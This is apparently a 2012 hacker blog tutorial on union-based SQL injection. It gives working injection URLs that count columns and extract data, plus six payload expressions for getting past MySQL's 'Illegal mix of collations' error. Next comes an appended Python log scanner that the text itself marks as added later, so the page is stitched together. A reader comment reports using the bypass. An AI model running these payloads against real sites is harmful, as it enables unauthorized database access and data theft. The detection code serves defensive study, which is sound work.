BLACK BURN HACKER


Monday, April 23, 2012

SQL Injection: Bypass "Illegal mix of collations" error

Here is my first tutorial to help the community. I hope it is helpful, and sorry if my English is not good.

Start by counting the columns:
Code:
http://www.yoursite.com/news_dett.php?id=30+ORDER+BY+9--
With ORDER BY 9 we get the error "SQL Error : Unknown column '9' in 'order clause'", so the query has 8 columns.

Proceed with a union-based injection:
Code:
http://www.yoursite.com/news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,6,7,8--
In our case, columns 1, 6, 7 and 8 are vulnerable.

Next, try to find the MySQL version:
Code:
http://www.yoursite.com/news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,version( ),7,8--
At this point our error appears:
Code:
SQL Error : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
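The error occurs because the UNION mixes a latin1_swedish_ci column with the utf8_general_ci result of version(). There are various ways to bypass this error, each of which converts the value to latin1 or to a binary string so that the collations no longer conflict: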
convert(version() using latin1)
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(@@version))
cast(version()+as+binary)
convert(version(),binary)
convert(version()+using+binary) 


Example:
Code:
http://www.yoursite.com/news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,convert(version( ) using latin1) ,7,8--
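
To spot this sequence in web server logs, the following added example (not part of the original tutorial) scans access-log lines for the requests shown above, including the six collation-conversion expressions. The log lines, signature names and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the request shapes shown in this post (names are hypothetical).
SIGNATURES = {
    "order_by_probe": re.compile(r"\border by \d+\b"),
    "union_select": re.compile(r"\bunion( all)? select\b"),
    "version_read": re.compile(r"\bversion\(\)|@@version\b"),
    "collation_coercion": re.compile(
        r"\bconvert\(.+? using \w+\)"      # convert(x using latin1|binary)
        r"|\bconvert\(.+?, ?binary\)"       # convert(x,binary)
        r"|\bcast\(.+? as binary\)"         # cast(x as binary)
        r"|\bunhex\(hex\("                  # unhex(hex(x))
        r"|\baes_decrypt\(aes_encrypt\("    # aes_decrypt(aes_encrypt(x,k),k)
    ),
}
REQUEST = re.compile(r'"[A-Z]+ (?P<target>.+?) HTTP/[\d.]+"')

# Constructed sample access log (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Apr/2012:10:00:01 +0000] "GET /news_dett.php?id=30 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [23/Apr/2012:10:02:11 +0000] "GET /news_dett.php?id=30+ORDER+BY+9-- HTTP/1.1" 200 312',
    '192.0.2.10 - - [23/Apr/2012:10:02:40 +0000] "GET /news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,version(%20),7,8-- HTTP/1.1" 200 398',
    '192.0.2.10 - - [23/Apr/2012:10:03:05 +0000] "GET /news_dett.php?id=-30+UNION+SELECT+1,2,3,4,5,convert(version(%20)%20using%20latin1)%20,7,8-- HTTP/1.1" 200 5133',
]

def normalise(query: str) -> str:
    """URL-decode ('+' and %XX), lowercase, squeeze whitespace, trim spaces inside parentheses."""
    text = re.sub(r"\s+", " ", unquote_plus(query).lower())
    text = re.sub(r"\(\s+", "(", text)
    return re.sub(r"\s+\)", ")", text)

def scan(log_lines):
    """Return [(line_no, client_ip, sorted signature names)] for lines with at least one hit."""
    findings = []
    for no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m or "?" not in m["target"]:
            continue
        query = normalise(m["target"].split("?", 1)[1])
        hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(query))
        if hits:
            findings.append((no, line.split()[0], hits))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `collation_coercion` hit on a request that also carries `union_select` is a far more specific signal than `union_select` alone, since ordinary search text can contain the words "union select".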

©2012, copyright BLACK BURN

1 comments:

  1. Brilliant to say the least. I successfully bypassed my SQLi using your commands.

    Thanks heaps,
    mothered.
